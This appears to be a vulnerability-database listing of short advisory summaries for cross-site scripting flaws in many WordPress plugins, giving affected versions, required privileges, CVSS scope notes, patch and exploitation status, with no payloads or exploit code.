Stored Cross-Site Scripting in the FV Flowplayer Video Player WordPress plugin (versions below 7.5.51.7212) allows low-privileged authenticated users - specifically those with subscriber-level access - to inject persistent malicious JavaScript that executes in the browsers of other site visitors or administrators who view affected content. The Scope:Changed CVSS metric confirms the payload escapes the plugin's trust boundary and can target higher-privileged sessions. No public exploit identified at time of analysis, and SSVC signals no confirmed exploitation; a vendor-released patch is available at version 7.5.51.7212.
Unauthenticated reflected/stored cross-site scripting in the WordPress plugin Drag and Drop Multiple File Upload - Contact Form 7 versions 1.3.9.7 and earlier allows remote attackers to inject script that executes in a victim's browser after user interaction, leading to session theft, account takeover, or pivoting against authenticated administrators. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV. CVSS 3.1 base score is 7.1 with a changed scope reflecting impact across the WordPress admin trust boundary.
Unauthenticated stored/reflected cross-site scripting in the Funnel Builder by FunnelKit WordPress plugin (versions <= 3.15.0.2) allows remote attackers to inject malicious scripts that execute in a victim's browser when they visit a crafted page or link. The CVSS 3.1 score of 7.1 reflects a scope-changing impact with low confidentiality, integrity, and availability impact and required user interaction. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Unauthenticated reflected/stored cross-site scripting in the HollerBox WordPress plugin (versions 2.3.10.1 and earlier) allows remote attackers to inject malicious JavaScript that executes in a victim's browser when they interact with a crafted link or page. The flaw was disclosed via Patchstack and carries a CVSS 3.1 score of 7.1 due to the scope change (S:C) reflecting the WordPress site context being affected from injected content; no public exploit identified at time of analysis and no CISA KEV listing exists.
Stored Cross-Site Scripting in WP Job Portal WordPress plugin versions up to and including 2.5.2 allows authenticated Subscriber-level users to inject persistent malicious JavaScript payloads that execute in other users' browsers, including administrators. The CVSS S:C scope change confirms the injected script crosses the security boundary into victims' browser sessions, enabling session hijacking or unauthorized administrative actions. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low privilege requirement makes this realistic on open-registration WordPress job-board deployments.
Reflected/stored cross-site scripting in the WordPress plugin Stop Spammers (versions 2026.3 and earlier) allows unauthenticated remote attackers to inject malicious scripts that execute in a victim's browser when they interact with crafted content. The flaw carries a CVSS 3.1 base score of 7.1 due to scope change (S:C), and no public exploit identified at time of analysis, though Patchstack has catalogued the issue in its WordPress vulnerability database.
Reflected or stored Cross-Site Scripting in the MW WP Form WordPress plugin (versions <= 5.1.3) allows remote unauthenticated attackers to inject arbitrary JavaScript that executes in a victim's browser when they interact with crafted plugin content. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:C) indicates network-reachable exploitation with no privileges but requiring user interaction, and the scope change reflects the cross-origin impact typical of XSS in browser contexts. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.
Stored Cross-Site Scripting in the King Addons for Elementor WordPress plugin (versions up to and including 51.1.62) allows authenticated subscribers to inject and persist malicious JavaScript payloads within plugin-rendered content. The scope-changed CVSS vector (S:C) reflects that injected scripts execute in the browsers of other site users - including administrators - enabling session hijacking and privilege escalation via social engineering. No public exploit code and no CISA KEV listing have been identified at time of analysis, placing this in the moderate-priority tier despite the network-reachable attack surface.
Unauthenticated reflected/stored cross-site scripting in the Quiz And Survey Master WordPress plugin (versions through 11.1.2) allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser after user interaction. Exploitation is reflected in the CVSS 7.1 (High) score with a scope change, meaning injected script can impact resources beyond the vulnerable component. No public exploit identified at time of analysis, and the CVE is not listed in CISA KEV.
Reflected or stored cross-site scripting in the Post SMTP WordPress plugin (versions 3.6.2 and earlier) allows unauthenticated remote attackers to inject malicious script that executes in a victim's browser after user interaction. The CVSS 7.1 score with scope change reflects potential session theft or administrative action hijacking against WordPress sites running the plugin. No public exploit identified at time of analysis, and the issue is tracked by Patchstack but not listed in CISA KEV.
Reflected/stored cross-site scripting in the Product Filter Widget for Elementor WordPress plugin (versions <= 1.0.6) allows unauthenticated remote attackers to inject malicious script that executes in a victim's browser after user interaction. The flaw was disclosed via Patchstack and carries a CVSS 3.1 score of 7.1 with scope change due to script execution in the browser context; no public exploit identified at time of analysis and the vulnerability is not listed in CISA KEV.
Reflected/stored Cross-Site Scripting in the WordPress plugin AutomatorWP versions 5.7.2 and earlier allows unauthenticated remote attackers to inject malicious script that executes in a victim's browser when they visit a crafted link or page. The CVSS 3.1 score of 7.1 reflects a scope change (S:C), meaning script execution affects components beyond the vulnerable one - typically authenticated WordPress administrators. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Subscriber-level stored Cross-Site Scripting in the Modula Image Gallery WordPress plugin (versions up to and including 2.14.23) allows authenticated users with subscriber privileges to inject persistent malicious JavaScript into gallery content. When a higher-privileged user such as an administrator views the affected gallery, the injected script executes in their browser context, enabling session hijacking, credential theft, or unauthorized administrative actions. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low authentication barrier and scope change to admin sessions make this a meaningful risk for multi-user WordPress environments.
Stored or reflected cross-site scripting in the EventPrime WordPress plugin (versions <= 4.3.2.1) allows authenticated users with Subscriber-level privileges to inject malicious JavaScript that executes in other users' browsers. The flaw was disclosed by Patchstack and currently has no public exploit identified at time of analysis, but the low privilege bar makes it attractive for opportunistic attackers on multi-user WordPress sites. No CISA KEV listing or EPSS data was supplied with this report.
Cross-site scripting in the Simple Membership WordPress plugin (versions up to and including 4.7.2) allows injection of malicious scripts that execute in the context of other users' browsers. The official CVSS vector assigns PR:L (low privileges required), which directly contradicts the CVE description's claim of 'unauthenticated' exploitation - this discrepancy must be resolved with the vendor before accurate risk tiering. With a scope-changed impact (S:C), the primary concern is an attacker inducing a privileged user such as a WordPress administrator to trigger the payload, enabling session hijacking or unauthorized administrative actions. No public exploit code or active exploitation in CISA KEV has been identified at time of analysis.
Unauthenticated reflected/stored Cross-Site Scripting in the Classified Listing WordPress plugin versions 5.3.8 and earlier allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser after user interaction. The flaw was reported by Patchstack and carries CVSS 7.1 due to the scope change affecting the broader WordPress site context, though no public exploit identified at time of analysis. Risk is elevated for sites running the plugin in publicly accessible classified/marketplace deployments where untrusted visitor input is processed.
Cross-site scripting in the Contest Gallery WordPress plugin (versions <= 28.1.6) can be triggered by a subscriber-level authenticated user, injecting malicious scripts that execute in the browsers of higher-privileged users such as administrators. The CVSS Scope:Changed metric confirms the payload escapes the subscriber's privilege boundary and impacts other user sessions. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low attack complexity and broad WordPress ecosystem deployment surface make this a meaningful risk for any site accepting subscriber registrations.
Unauthenticated stored/reflected cross-site scripting in the AutomatorWP WordPress plugin (versions <= 5.6.7) allows remote attackers to inject malicious JavaScript that executes in the context of victim browsers, including site administrators. No public exploit identified at time of analysis, but the CVSS scope-change rating (7.2 High) reflects the cross-origin impact typical of XSS where attacker-supplied script crosses a trust boundary into the WordPress admin session. Patchstack reported the issue and tracks it in their WordPress vulnerability database.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38827